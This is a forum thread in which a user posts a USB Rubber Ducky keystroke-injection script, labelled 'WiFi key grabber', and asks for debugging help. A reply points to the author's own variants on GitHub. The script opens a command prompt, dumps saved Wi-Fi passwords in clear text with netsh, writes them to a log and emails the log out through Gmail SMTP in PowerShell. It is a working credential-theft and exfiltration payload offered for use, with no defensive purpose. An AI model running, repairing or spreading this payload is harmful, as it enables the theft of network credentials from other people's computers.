AllenHelmet Posted May 6, 2018 Share Posted May 6, 2018 Hello so i found a script and i needed help because i was getting alot of errors and i couldnt seem to fix it so i came here What is says is was unexpected at this time and then this is the email i get: SSID: %A% Network type: %B% Authentication: %C% SSID: %A% Network type: %B% Authentication: %C% SSID: "%A%:~1%" Network type: %B% Authentication: %C% and This is my script GUI r DELAY 200 STRING cmd ENTER DELAY 500 STRING cd "%USERPROFILE%\Desktop" & for /f "tokens=2 delims=:" %A% in ('netsh wlan show interface ^| findstr "SSID" ^| findstr /v "BSSID"') do set A=%A% ENTER STRING set A="%A%:~1%" ENTER STRING netsh wlan show profiles %A% key=clear | findstr /c:"Network type" /c:"Authentication" /c:"Key Content" | findstr /v "broadcast" | findstr /v "Radio">>A.txt ENTER STRING for /f "tokens=3 delims=: " %A in ('findstr "Network type" A.txt') do set B=%A% ENTER STRING for /f "tokens=2 delims=: " %A in ('findstr "Authentication" A.txt') do set C=%A% ENTER STRING for /f "tokens=3 delims=: " %A in ('findstr "Key Content" A.txt') do set D=%A% ENTER STRING del A.txt ENTER STRING echo SSID: %A%>>Log.txt & echo Network type: %B%>>Log.txt & echo Authentication: %C%>>Log.txt & echo Password: %D%>>Log.txt ENTER STRING powershell ENTER STRING $SMTPServer = 'smtp.gmail.com' ENTER STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) ENTER STRING $SMTPInfo.EnableSsl = $true ENTER STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('Hereitypedmyemail@gmail.com', 'hereitypedmypassword') ENTER STRING $ReportEmail = New-Object System.Net.Mail.MailMessage ENTER STRING $ReportEmail.From = 'hereitypedmyemail@gmail.com' ENTER STRING $ReportEmail.To.Add('hereitypedmyemail@gmail.com') ENTER STRING $ReportEmail.Subject = 'WiFi key grabber' ENTER STRING $ReportEmail.Body = (Get-Content Log.txt | out-string) ENTER STRING $SMTPInfo.Send($ReportEmail) ENTER DELAY 1000 STRING ENTER DELAY 500 STRING ENTER DELAY 2000 STRING ENTER DELAY 200 STRING ENTER Quote Link to comment Share on other sites More sharing options...
DeDogeGod Posted May 29, 2018 Share Posted May 29, 2018 I had this problem so I made my own code. You can check it out and use it but dont steal it. Heres the github for it, https://github.com/DeDogeGod/DeWifiCreds-RubberDucky I explained it on the github page but there are 3 different types. One is similar to yours but I decided to use mostly keyboard binds and the other one uses a software to get it. The software one might get detected but virus defender and shiz but its REALLY FAST. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.